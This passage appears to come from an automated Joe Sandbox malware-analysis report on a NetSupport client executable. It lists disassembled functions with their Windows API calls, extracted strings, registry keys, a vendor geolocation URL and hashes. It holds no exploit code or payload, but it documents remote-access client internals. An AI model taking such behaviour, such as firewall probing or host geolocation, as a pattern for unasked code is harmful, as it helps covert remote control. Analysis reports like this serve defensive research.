                                                                                • Instruction Fuzzy Hash: 9891F6B0E06365DEEF02CBF488847ADFFF0AB8830CF1445AAD45597285EB755A40CB52
                                                                                Function 110287A0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 130librarysynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110287F1
                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                • wsprintfA.USER32 ref: 11028814
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028859
                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 1102886D
                                                                                • wsprintfA.USER32 ref: 11028891
                                                                                • CloseHandle.KERNEL32(?), ref: 110288A7
                                                                                • CloseHandle.KERNEL32(?), ref: 110288B0
                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028911
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028925
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                • API String ID: 512045693-419896573
                                                                                • Opcode ID: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                                • Instruction ID: fa2db278f690afc2f691dfd055e17c1d40a227d38623a0fdca6da18cc7b7963a
                                                                                • Opcode Fuzzy Hash: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                                • Instruction Fuzzy Hash: 4F41B679E40228ABD714CF94DC89FE6B7A8EB45709F0081A5F95497284DAB0AD45CFA0
                                                                                Function 110860E0 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(PCIINV.DLL,1B702977,03277FF0,03277FE0,?,00000000,1118368C,000000FF,?,11032002,03277FF0,00000000,?,?,?), ref: 11086115
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,776CC3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                                • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 1108613B
                                                                                • GetProcAddress.KERNEL32(00000000,Cancel), ref: 1108614F
                                                                                • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11086163
                                                                                • wsprintfA.USER32 ref: 110861EB
                                                                                • wsprintfA.USER32 ref: 11086202
                                                                                • wsprintfA.USER32 ref: 11086219
                                                                                • CloseHandle.KERNEL32(00000000,11085F40,00000001,00000000), ref: 1108636A
                                                                                  • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7572F550,?,?,11086390,?,11032002,03277FF0,00000000,?,?,?), ref: 11085D68
                                                                                  • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7572F550,?,?,11086390,?,11032002,03277FF0,00000000,?,?,?), ref: 11085D7B
                                                                                  • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,7572F550,?,?,11086390,?,11032002,03277FF0,00000000,?,?,?), ref: 11085D8E
                                                                                  • Part of subcall function 11085D50: FreeLibrary.KERNEL32(00000000,7572F550,?,?,11086390,?,11032002,03277FF0,00000000,?,?,?), ref: 11085DA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                • API String ID: 4263811268-2492245516
                                                                                • Opcode ID: 79300dc539d0ee21f2e412ecc2afba85115f3a9800858e180ea8acaac6af75d4
                                                                                • Instruction ID: cc6116ccc6b21cbbfdc815c98c7fdad09c9720580d605ccac26d10648bac74b6
                                                                                • Opcode Fuzzy Hash: 79300dc539d0ee21f2e412ecc2afba85115f3a9800858e180ea8acaac6af75d4
                                                                                • Instruction Fuzzy Hash: 5471CDB4E44709ABEB10CF79DC51BDAFBE8EB48304F00456AF95AD7280EB75A500CB94
                                                                                Function 11030B78 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 190synchronizationlibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 11030CB3
                                                                                • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 11030CCA
                                                                                • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030D6C
                                                                                • SetLastError.KERNEL32(00000078), ref: 11030D82
                                                                                • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                                • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                                • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                                • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                • API String ID: 2061479752-1320826866
                                                                                • Opcode ID: 31d4d7e0d446ccaa05157b9b8574c54ec02251f8c6dcbf221a4ba88b6680946e
                                                                                • Instruction ID: 041cc1499d836288ec3ce923e3d2bdfde1aeba2e10a7f52041b4b34688633552
                                                                                • Opcode Fuzzy Hash: 31d4d7e0d446ccaa05157b9b8574c54ec02251f8c6dcbf221a4ba88b6680946e
                                                                                • Instruction Fuzzy Hash: 64610974E1631A9FEB15DBB08D89B9DF7B4AF4070DF0040A8E915A72C5EF74AA40CB51
                                                                                Function 1102D360 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 289servicesleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102E368,00000000,1B702977,?,00000000,00000000), ref: 1102D594
                                                                                • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102D5AA
                                                                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102D5BE
                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5C5
                                                                                • Sleep.KERNEL32(00000032), ref: 1102D5D6
                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5E6
                                                                                • Sleep.KERNEL32(000003E8), ref: 1102D632
                                                                                • CloseHandle.KERNEL32(?), ref: 1102D65F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                • String ID: >$IKS.LIC$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                • API String ID: 83693535-1096744297
                                                                                • Opcode ID: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                                • Instruction ID: 28ce5055a28a8f5180363266ffebbc24acbf765ee5ceddae65e6c679609cb99b
                                                                                • Opcode Fuzzy Hash: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                                • Instruction Fuzzy Hash: 3DB18F75E012259BEB25CF64CC84BEDB7B5BB49708F5041E9E919AB380DB70AE80CF50
                                                                                Function 1102CB60 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CBA5
                                                                                • GetTickCount.KERNEL32 ref: 1102CBCA
                                                                                  • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                                • GetTickCount.KERNEL32 ref: 1102CCC4
                                                                                  • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CDBC
                                                                                • CloseHandle.KERNEL32(?), ref: 1102CDD8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                • API String ID: 596640303-1725438197
                                                                                • Opcode ID: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
                                                                                • Instruction ID: dd5538bcf42f02d8fc6af97e821dff418cbfa7b7de554536dce4014f8caac367
                                                                                • Opcode Fuzzy Hash: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
                                                                                • Instruction Fuzzy Hash: 62817E34E0021A9BDF04DBE4CD90FEEF7B5AF55348F508259E82667284DB74BA05CBA1
                                                                                Function 11062220 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106227A
                                                                                  • Part of subcall function 11061C60: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 11061C9C
                                                                                  • Part of subcall function 11061C60: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11061CF4
                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110622CB
                                                                                • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11062385
                                                                                • RegCloseKey.ADVAPI32(?), ref: 110623A1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Enum$Open$CloseValue
                                                                                • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                • API String ID: 2823542970-1528906934
                                                                                • Opcode ID: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                                • Instruction ID: 91282df486796d8d45fa06834b6704f4eef725291cd5fd64ae30f86ab301b8e1
                                                                                • Opcode Fuzzy Hash: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                                • Instruction Fuzzy Hash: F6415E79A0022D6BD724CF51DC81FEAB7BCEF58748F1041D9EA49A6140DBB06E85CFA1
                                                                                Function 11138580 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • GetTickCount.KERNEL32 ref: 111385E2
                                                                                  • Part of subcall function 11096D90: CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                  • Part of subcall function 11096D90: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                                  • Part of subcall function 11096D90: CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                                  • Part of subcall function 11096D90: CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                                • GetTickCount.KERNEL32 ref: 111385F1
                                                                                • _memset.LIBCMT ref: 11138633
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11138649
                                                                                • _strrchr.LIBCMT ref: 11138658
                                                                                • _free.LIBCMT ref: 111386AA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                • API String ID: 711243594-1270230032
                                                                                • Opcode ID: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
                                                                                • Instruction ID: 5891752c4c55aadc8c036c0ba7fa863b534ef4ea4707a2085efa3f6ff011156f
                                                                                • Opcode Fuzzy Hash: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
                                                                                • Instruction Fuzzy Hash: D8419C7AE0012E9BD710DB755C85FDAF778EB5531CF0001B9EC0997284EAB1A944CBE1
                                                                                Function 11133B00 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 107COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 11133B70
                                                                                • GetTickCount.KERNEL32 ref: 11133BA1
                                                                                • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11133BB4
                                                                                • GetTickCount.KERNEL32 ref: 11133BBC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$FolderPathwsprintf
                                                                                • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe$.su
                                                                                • API String ID: 1170620360-2478739915
                                                                                • Opcode ID: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
                                                                                • Instruction ID: ff3437da4bce093be243bc4ea55ba4e08a4d9634e929d706e548d7c9b68f93f5
                                                                                • Opcode Fuzzy Hash: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
                                                                                • Instruction Fuzzy Hash: 68315BB5E1022EABD3209BB19D80FEDF3789B9031DF100065E815A7644EF71B9048795
                                                                                Function 11134D90 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
                                                                                  • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                  • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                  • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                  • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                  • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                • AdjustWindowRectEx.USER32(11142328,00CE0000,00000001,00000001), ref: 11134DD7
